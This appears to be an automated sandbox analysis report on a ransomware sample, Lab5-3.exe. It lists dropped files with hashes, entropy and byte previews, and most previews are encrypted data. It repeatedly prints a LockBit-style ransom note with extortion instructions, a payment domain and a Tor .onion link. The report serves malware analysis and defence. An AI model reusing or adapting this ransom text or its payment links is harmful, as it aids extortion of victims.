                                                                                                          Preview:...]..J.h[^d.`......X.....m.k..~n.Y<.".Q.c.-...I..tR.^.fbA..F.....z*.....#.b..O@....1....bA..[.E.n...G....".e...0.."......?....n....e.s...!.0^...|.'2z..R..<F..S.l.Z....1.u"X...6K.R........9..8.N9..B5z.....Z`w$|..@Q...#..QI..a.W.,G, ."...*.o. Gpm..AWfx..v.j.T..Q..c...nl.V.@..:.t.O..v.&....I2$...".c...#=j..W.,.H...?......k.%....VB.....>.`........6>..0H3..^H(...i:N........}..im..hV....F..m^.,.t6..s.K....F...9.....#!M...f.....N.R......k.<.=..Wbt......"......V.wf...{V>..l..W.-CQ]e@s..q.... ...,..).P...R.<."..Zi...]..ME%.kC.X[p!..[q..,o..D.F....W....>..X.l2..`i..Gr(..*..|tu ......,....[..4"7.......h...'.X.&i..z..e.O.........mu.]r.D..b.(A.1..klk_k.. kX..<Q..r*..1.@......8.......x}sC:G..-t5.........!o..%....4.....;....h....M..\..x.wY...,.7.V......^.{..t.lE6..U.|..Mb$.t......v..8...645.....v.-...L;.6x...(.......B6...+.PFqk0S.m.m.<.@.(.....F...N.<....K...W7s.wa.......... q.[.n~...Fr...o.g .fV...3.>"...j..1........._:...,k...'......0.T.,..Bj........*.......&
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2368
                                                                                                          Entropy (8bit):7.922980336245903
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:czrOeS+HCuqr3KJ5TkAJjcpnvgHfUTid3hBaUoSGFcmeykEdEElU92i:MS+HCuqGLZJYpnvnGx0uKeY2ElUJ
                                                                                                          MD5:C8DD8A8D14E3037598C071FE7F5D4C3A
                                                                                                          SHA1:882AADAF0CEAB108CBF87E93F68E9F0265BEF15E
                                                                                                          SHA-256:F20498F86EEC5A063BA2D0FCF4BBAFCB9C8A5E7B1654C30F6D3556EFC6C0A790
                                                                                                          SHA-512:AFD761D2BAE73B87C0274D3C26CBAD76EE2525A095DB4AAAA62F5E72FEC5EE9F6D7CBE4272D142A1E0128799E73524B59EFAF99C278468C02B397419173CDC42
                                                                                                          Malicious:false
                                                                                                          Preview:..-q.........2}..).-*..O....l........Tq.xF.1.!...."#|...L.{..=.#..wh.^..7......gW....6Z...P..P..........s'.....5N..z...AW.u..)W....5.o.I...(......v."....b.F......2Sg.:)...>.4....B...y......(=...;H4%.DE..H.l.j.G.ya..x.Lk....*...X>".?......mnu.`$s...'............k.vB..r....Q..>..?\it.1-/S.=.S....Tqa.).@X~....)''..-.k....W.Z........4@..p.....fy?P...sr..]y....D..SY.@....~.=.....S....-.$Pg.-.N.Z'8....wP..2i..5..w.T..q..L,A.F.3.s../h!H8.....>......@wQ.}Q.6Yf.RM...{.0..V?....Z.;^.Y.B.V...n.T.zM...K.:.0Y.r...D.A.V=.,.4..|.....f.@T|.c.....?B`|...L..[r2.+...........-[qe.!\pMT..%K....#..&....y..G.w............fm..C..=5.6%%.#..p...s......._.1.J8.H.@?v..................f..L......c....u....(Y`q1.].`C.J.;..v..}.v.-....JxLK.IV.....k..!\8>m.6...sL...eM..........6...3.8.\f.H..V..P..8 ..R..bF.......5.>D.Hk...T...3.#@P#.N..cd..Ji...p..u@S.b.[..|`..........u....Rc.GC.5...E..QPq.M.:...0.D.1..FAG.#,Nm.3tn......$.h.B...u..t.+.'F..RTh".x.u.....$2...jEM8.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5616
                                                                                                          Entropy (8bit):7.966257323909292
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:pejn6lgdkHXD4OJhJdoFrxFqKJMJjwalkjmnGx0uKeY2ElUJ:pe4PJ8y+Tauj50Cb
                                                                                                          MD5:0340557363FDE3C4FA8AD62F0E66E00D
                                                                                                          SHA1:B2ADFC3FA451AEE59FB561247CA7A45C4053BA4E
                                                                                                          SHA-256:B98F84407302908ADDBA77BC7B26A5F1E83897EBFE8138C308599959FAB181D3
                                                                                                          SHA-512:2E521BF3E9C5FD219485FB67D4FA5536FDC92C914EB6B7678F2B6FABE3EDE54EDE543D995BA6A0A992682DD4698CFAC38D3542D13FB77F73221CDE0259EA62CB
                                                                                                          Malicious:false
                                                                                                          Preview:...89...^#eN..u[9.q'...mH.l.N../...xnu...SN...XOr=..J....V...w.?2o.&..-...?._.r50.^.......V...?..YRh.....i...)...K...z...uc|.......wc......K_HQS.P?.y.Km....+...S.N..l..d..Q...C......aZ. ]$......Y..K:...P.%.c...+.6}..fSP.8R`E...._.T...[U....EU.......A..v...#..)q..S.1.m.?[3..}t...8?.....k3.9..-.)`..0..9A.]..Y..mS..g~....I.c"....HSo......-.+*k.....{&C6....c.9 P6&.+....^..~....(......w..U..B.......]..3....V...C.....+Z.....!...`S.D......IG....,..N.gT.....^f.Hn..^.~...M...l..../...=~'.r...K...,|.1...1..*E.4..*c..;c.k....._...Z.Q.g..U..#....e*.X-.@..P.....%..;..v<..<.....%e).3.i...5....T.....$.y....P}h......|....pLS[..9.Lr.+BM6...>.2...x.x0..h(...Aq\Gz...OG....X....l}w8c...Y.t.%l.G........<uq..%<...ga..ao+.s1...F...s.......xHj.*..W..2j..=1......9..4."H.?0.5..d.c....h.M.".X...x...+..e-.......n.M.1D.l.H....!...~..t.......L.>*C.q4...b.F..... F.[K.....p.G.U5.OH..=B..t.O...q..P....w.1..|\...`..L..e..q.#.9.F..u;.>.(K+qog..-J,..[y.O......;5.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3968
                                                                                                          Entropy (8bit):7.954767220052044
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:AEfkQqNth2sX2PAya3hZ6BepdSGx0uKeY2ElUJ:AEfaB3XR0Cb
                                                                                                          MD5:C2BA6D902DF62192A086A7945656A921
                                                                                                          SHA1:460A74903D709373538A29AF4A3ADC8BCA25A68C
                                                                                                          SHA-256:9D60A05C4095BE883B5869443B14D2586D7BB6FEAB296F884AF1460C81837059
                                                                                                          SHA-512:48B9EFA0FB0F03362FF13C73DA23C1FEC3FCA0022E1E1E4ABA5ED8686F84C721394332CBDA886E51C7F965A964926AA6C286CA0A25EE502C6F6EA5B93D9C7DF8
                                                                                                          Malicious:false
                                                                                                          Preview:N.t.O/d.z.#.%.4P..".M..2..q..L.:.{.4._l?h...#..h.r.M..=.X.|.A <#..7...e............cxv.C$...I.?.*}.:H.e+"?..1......v.R..u.v%..rY.....Q2.3.!...3Ni.....w.,E\.IlC.:@.........'d. _.... .....2...|m.*.w'.Fa..?.wr";..D..!..........,...h<...Z.v....H....:n...G).v_r.=....0.....m.mh..sg.r...O...v.i.._.......U.....>\..c..{LZT...Q....-%B.......^.>......r...5..<....6..2j8y.RA...c.dj.w^&M<a8...e...D.<....X.h..#..t7....!`.OXC.]....!b..n.9a|i.#..`,..........\..^.\0...0&.....)N.K.V.&.~.<....._.d.a.k.%.5m..._...Y....K^..Q.4<.,..%ck.l....zT..Z.,...bI...(....<.....j.<.....R.)f/-Qg...6....`E.B.dg..|....O..x..7.!.....}.Nr.).....]..d.4...h...{.<.s.drN...O..K..l..w;4.#.:n...^........[....I"\<.............m0.^...H.+.k.T.6"'.bN...%.*..%Z=.).M.H.[..#.(.2..|..#2.4|.L.{|l...q..o.=.X&....P{...b.n:.P).,..zs7O~.....ok.&..Q!.D...+...7.....Sg..S.Qm.Z..|..q"J....L.A.Lj... W.7..CvQ.h9]...}..H..%.C0].$rKT.1.A.x)@.1..?..j.-.W...77.&.<.e..K>.$x..#...h#.d.8...M.r\V.w .UMm...]
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3984
                                                                                                          Entropy (8bit):7.950318715815203
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:MHZg2jW7lRyGu3OF5T17G5txvmxkGx0uKeY2ElUJ:euSW7lr0ok5nvUH0Cb
                                                                                                          MD5:2CA0A94E33582E1966A2D61CC7B3E7B5
                                                                                                          SHA1:A5BE9882803EA5A1D6714F89DD16EAAAA9656243
                                                                                                          SHA-256:1407D4B8797939597E5882D2289794BF47ACE18B9CC31B0D88BA11FBC5112006
                                                                                                          SHA-512:384A05564C36C97A3E33D876CA89D448D62BE917F5AAE8992795741D004C3364BA8E285D10C61C1B270887E14BC1AD51947E44EE4456F13AB431B6CE343B61FB
                                                                                                          Malicious:false
                                                                                                          Preview:...u.g0&...k.,".| .'\...X.m........?3..W.H.y$e.E\.D.".J.TO..p.s....q...3....Q.zU....W....o...a.O...xaQ.q.*....J...qE...}H...]QVv...F.l"..!.D....+.m..+B..?.......z...v.2......n..6..2.....fkA...+..CN.e.N.....n..W(2.Jr.Vk...Fho4.<t...4?}.n.q.....MM. ]0f...4...UMQ.,v.]%>.#o.d......T.V..g.......w.23N...?..c..[O}.1s.28.d......$Nq9.94.,...........H+...n)..n."B...k..<...s..\.i....?...('b.<....`.|.I.... .......:..z.Yv.....p...........!.x..C....%#s..Z...\.Y...5<q..P..8.Bo..D.4......0..m.`..z3ys7j."a...F\2...:z.........t...[...Mgnuy.ReYu........c.;?.R.....=O.....5.%...Q).Z...v..-..........U?.. ..]M.E.d..OK..<....u.....[./,..A..8.z.g..~Jq........t..Q..oG.1.!......,.B.X..........E.....=t44. .."..0.w9..\..-i03%P..3U..?..wX..._b.r..2..=...A.[.......Rn.cC. .w...)...a...g.V?.L-..........1A...dN0<.....'..i..w.F.....=&.&...$.q.J.K.J.e\..3V...H.&...8..C.<..D.<q.U.@...D.n..T.._..v.|@$h.^.H...B>.X..8..u.......j..P(]93....bt.h(.o...(2.%.K....8wR.i....~
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4192
                                                                                                          Entropy (8bit):7.959424105039482
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:GUjTE5vKj3XIH8f2UE0H2BPDuLMDlkIGx0uKeY2ElUJ:9Z4HjBrWNr0Cb
                                                                                                          MD5:B7FD8820C419CC1B3E8D54F120CD0988
                                                                                                          SHA1:A7C3914740CC90B5CA224B683ABC7C4D4A800BBF
                                                                                                          SHA-256:FF2176096D0E6ED4DBDA8CDAA5C4454E8E69112D1BF234CAFE725DB96037D4BA
                                                                                                          SHA-512:CC33F1F023BDA4F9392F33635778D2E17667C39E1A7D61E6D782A2A748369413391F71976EC5CC3EC0A44AC7D49445FEAF9CF586AE838C7AA349E6CDEEBC226E
                                                                                                          Malicious:false
                                                                                                          Preview:.&L....#.5./d..8.vxO... &....n..p.L......$..:..C.Z...M.......6UN..B0%./..0.\.....k....&.....w..[o.,P%..:U.f..dA..]P.......C.M?..)\B.)..O..h.p....^.u...z....A..:.....G..a..e..~[...9.'#..=!...M..{M".q\.F.IN]..#...oB.y*..B(9w..s....*..|..'%..tP.U7.K.xl..,....d..8....b............^7.......x.\..f.B .@H...hZS.ZA...2..c.n....&...!.G.n..z..C..TE].[c.....Z....B......c....0...].g...*..C"~31*...@R..k.."-<...Y.f.IN.w...a......5..$.w.........:.#..a.b"P..n.paI.Gk.w...@.?..s..jv.H.5.D..O..IF<<....!.......7M\.W.@6..U...M.uZ.co/W... x.K.@.....5.r!.....<.RB.".M.H.@...(YhN.5w.o.I.b...I.Y.._..&...z8..LZ.P..Cx.p...M.6N...m.[..5Q.6.U...?)wl.G.si..z.......t..x.N.y..Kb........s....}.|c.{...9.c...8..y.......MA..'..o.qP..{u..cCc..DsT.U..^.4$....Y{......:..]...N:..x%@.@o.m..83?......-(j.uu..........)M....x..M...Nk.=..^?_=.4.F.2.)3.u..E..5.E.pU..4.9T....\...f`....T..........:.........Wb...p.".v.#......T$`..Mo(k.%.2...'.+B...m7..q.......Q..5~9".....9#...9...~T.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):58672
                                                                                                          Entropy (8bit):7.9968462806693
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:UwckpQypWoRN3w+xvS5Hpo/tynAHu5lpndZ:UBkpQypWozw5bn9pdZ
                                                                                                          MD5:CAC48EC1500223AD171C78018FA2F549
                                                                                                          SHA1:4F0560A1350CFD1540B937359E3944241207B216
                                                                                                          SHA-256:13DE350062E6CAF1AD00B40B86D2260BEA93EA9C73189ECA3162477A9F482F56
                                                                                                          SHA-512:6320A4267CBCECBA0094BAB01C502D792EBE6739C1CB66ACCBAAA1C34544AF2C71D845D590B05ABF6DE5227F877EA24A5C01DC164F17BF3C0748700A6505ADDF
                                                                                                          Malicious:true
                                                                                                          Preview:.2B.9..."0j..e^g./.$z..~f...#..4...sj.&....D....P.;..,c.z5....R..p......c2.`{$V....|.._.#.l.-.....MP).tH...M..L^'(,.6....ihD...5..2$.+.h g.......R..{......7..7o,.."J../w.LGT1S.C.=%..ss?M{d8.u).?.wd.. ....p5...tB.S.n..`......EH.h.<.._[.O..:,m_Y.....q......09!.}.4N)..V_Kf.}UI..0z.....7.....3.B..K.......N+.[d..^.. ..M..Xq5..wi|.$./m$..J<......:bj$........B.>......u__*.q..EJ..O.}y/e.].,a...tP=D....x7\...n..z......{.U...H."{T....O...7.U.*..x.U ..~.K..J..k.P0/...Ev?o\.X.....RJ.!..td.nw.,...-..lh...4....}.-.d$Ur.<.`(......=.B...$. %...-l.}T[......B....... ......`4e... .M.....+.V..[.$..&..=...]...h{..~.`m.",..Kp...".D'L..(^..MS.......p"FN.N.tW+q.A..J>G.@(......m`.g...._...Y...y..e+..%.3....-H...I..yo.>.!8.`.:.w....(./wv......o....-......V.B.O...\DTbUF,..9...7..v.^3c.|...Z;..- XA-..g.M.xR..NZ...-.........a v.....!......j(.<R.3...)."..>....N..K0.Hn..........1*U.....5....'K.....~$....-.2.'...T.e_.`....#]..$. ....O....!........MA..b.u!.=....k..X+...z
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6064
                                                                                                          Entropy (8bit):7.972475949944041
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:wkzsgN+9GZ3n4ZD7sN/C2ImE70opGi73Rfh4oMLmXBpw9uyGx0uKeY2ElUJ:X5A0Xw7Y/N88i7hfuojXBpJ0Cb
                                                                                                          MD5:2296FA02B002BEFEAAA6F92942063CFD
                                                                                                          SHA1:2BB892EAFB52D0B8E4D1907B8D459C885D1DC4DF
                                                                                                          SHA-256:F6FE6D8E5914520AD5783A492D8DBB5FB0C6B9F74C6D78C2C5075DD2C7CE5D38
                                                                                                          SHA-512:3EA46801F1E6EE8EBA94228DA4E861E21C13DCFB7464784E058B5663E01DB429DAAEACDE27A5A323435D4A1CBE7DA00E8DB6FE43F275AE62FB9698687B43F119
                                                                                                          Malicious:false
                                                                                                          Preview:7...#%..i...l.......D.f~.7....5p.,..dH...k.o..dOg.."......d{..x.3-.yn.O.."...,TU.u..8I\.....(nos]#J.{...W....l.......*.zXGf8!Jq...{..J...-a.H}...ml.~..!Ig.n.....e....5. ..i...K...[...v}..c8.{.T...2...'PF.r.H..=L-.f........j.F..2d...6u........W.....l...{I.}..Z..e3a........y~.^..J..Umq.....qt...EL.SGP...j.....0.cF+c3...(../c(.=7S....G|.....C)..L..+g.S.x..x.....^.j&C..cb..-+...y..qx.....>.l4.[l..E...F........<.R......n.L..........>....-..s.Z.C.k4..Y.3l[j...E..p........|=T........F....#..Hn.U...tO)dS...X......zW...~.."...;Y.\-....Q:9...G@.d........2.bL&o..T7......$.C.I..O".>.:'.......6d.^...E...I.u...B.....*..i..GL...5.R..J..>KHQ..4.......{cU..P.....B..7.a..+.xE2....C.g..%..n..T.8`.....d.m..u...}..:.../.R....t.6.L;.H.f....q.m...Y m....!.Z.;.I..-1L..].I@.}+..s.....8G.z..5 $&....i"..A..../.....%.^tt.!.......,.!Hr.A%...+....O.I...w.lJ....**z.R.#Rr!...T}......v.n....kz..P.V.l.w..........\.f.2..F....b......Bc...&..S.n..{.'..b.&......#..I.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6112
                                                                                                          Entropy (8bit):7.968470931562388
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:ijkLP53Eou4DF/e92uSdrHK0UDLLiPN5thwV1Nya8sxcoOr+V3aGx0uKeY2ElUJ:iToRruS/UPLazUI2iiZ0Cb
                                                                                                          MD5:D93FED8DAF24A7BAE4C0ACD9E95B6B77
                                                                                                          SHA1:D435ACC66A98FC5F4CD2BA0CA417BF6E3C7166C7
                                                                                                          SHA-256:6087EE73643E9839EA831AE36CF8E62A59D67AC9213780EF3ECB43C0BBF07ECD
                                                                                                          SHA-512:755BAED7C4245D91EC0C755DEC94B96C1DD226DA6F898FF2271FFAFDBDF3B93A7EEA425E9E1E341232BEA9E51B48114D3E084B10704BE31B0A908B3A35BC2F62
                                                                                                          Malicious:false
                                                                                                          Preview:d.pl4.RR&.....3...D.Z.[]....4.]-...n.....6A........i)....7B1yCQ.!.M.|a/......@.;.+.F....v.B.......[..h;.V.d...~'5...oV../.Hp^.4..d.o..k.Cb.W.c..L(..Akw.r.MW...&...K.^y.+CK...'.E.........'....U...;. ..T~.^ .a.!.g0.w..M...P.Z)..p...e.i..9R....L.. .^k$./I.....'<E..-9,.BSl...+]..k~.....e&,W!.0......)....(%H.^-gD.J.-.m...[..(.6[....M.......S..E%I..8.)<...b...?.(...../o..c.lS.."...BX..6.....I....q.U...s/ ..CA..0s..BHF.rA.qTRQ.o]q.s....k..|M.3..M.9.XN.y.V...!.jr..N....g.....N...%..r|i~.y..m..O.S~A.'<.T...._~.H...$l2...=.-3c.r..m.S....j.*..#.9.....Y......y.V....Tg/.n8.Cg.|...b...R.....k...uJ{^....se5....U..U...5;/>=OHc..k,../1-nd.Z.....v.......Y.Ll.:,O)-......r.<....G..m........A.Zz....S.2m.)q#\'}.....Y......5.jt....J>...?..:W../.F..?....0.y.S..Ui.....5..C.Lf...N.Tt.$.....[.(.I5....0. ....aW.eQifK.._......0.C3.;s.;E.....L.Kv.......A..0O.e:wi....(^>..s^+.N....W.+....V..V$.2...AH..M.&'.o...P.=.{..~h..n.I...?.C..$}._-..z`c.)N.Ww.GG.........."..d_v.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5712
                                                                                                          Entropy (8bit):7.970934603642859
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:STCltl819zHHjNwDHosaMaogfUN4z/126PrMqUr9ErQdWpZyrMucTuHtV8Gx0uKk:wCltMpDLsaMjgy626PrpxQdWpZcnP0Cb
                                                                                                          MD5:6872DFE738451DA57F765630EAEE75F9
                                                                                                          SHA1:8D1A5B9B5A4C360EBF60964F2DF245832C0D6DF0
                                                                                                          SHA-256:E96B62C274D13A3477D26257014EA079839A4ED0C711486BA7A1F4BAD9DB65F7
                                                                                                          SHA-512:2BA903C5111DA5A459BB7C4E37751F8FE3EE51A19C75828C510099962E3E31E8086F53C4B98C420161BA1F1BDC5BE1DCFD7B63502879812545BD9F22D762621F
                                                                                                          Malicious:false
                                                                                                          Preview::..D9.C....R...T.'..=.|".....?)EK...bh.s}_#.m."..O...@.....FO..Ka?O....x.....]...0.&.Uu&..q.....b..,......f:DG..]..*.3..r.G&nn*.....H.J.......`A.@.Y..G.d.Eq..f,e.N9....gs.)..5.qeO...*$..7tn..~q.P.m........`....._..\......Iw.."Q.E....N.2t....._i.1R(3k..A]..;..Y..1.....d.)..k....X(..@.@G...7..d......".e......M.ae..q.A.X.I+[..X..V.S...zE.....,.........eJTE....:.....WO.~c..v....'..U.9..3<....F.\.....?oxTG..S....O3A.NT.*3..}.3.-...IWh.....5........w....%..3......+.....l..S;.8..yo.i`.}..t..r...#....IS..6....Z...v...J...@..8.}.e<."...<.{..X.....U.q.W0...r.iJ.q..q..Lx..R....1Px..)..$n.p......c....oj.]..>...{?.^.4.([.<.y.0..,.$..h..,.o~....fm.HL%fZ.j...8...>..&d=..+..rf..Su.b...9........~.S.o..+..._..fo7z=...4W.*..&....h.uS......'..X.K{.E+......7.YT.NK$..)..QH.-.^..!.....^.Re......].,.<.'.1.v.O.4{..*.....s}...L..:..ZO\-*...._im.8|.G.._..R...F8ZIc.M.$P.ka@....&.zg?../].5....a....U/.h0.4..:O%^...5............C....m....6.....$...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
